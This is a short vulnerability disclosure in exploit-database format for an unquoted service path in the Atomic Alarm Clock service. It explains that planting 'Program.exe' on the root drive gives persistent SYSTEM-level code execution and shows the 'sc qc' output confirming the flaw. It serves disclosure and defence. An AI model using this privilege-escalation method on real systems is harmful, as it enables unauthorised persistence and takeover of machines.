#Exploit Title: Atomic Alarm Clock (x86) - Local Privilege Escalation
#Exploit Author: Bobby Cooke
#Vendor Homepage: http://www.drive-software.com
#Software Link: http://www.drive-software.com/download/ataclock.exe
#Tested On: Windows 10 Pro 1909 (32-bit)
Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
TAG : 0
DISPLAY_NAME : Atomic Alarm Clock Time
SERVICE_START_NAME : LocalSystem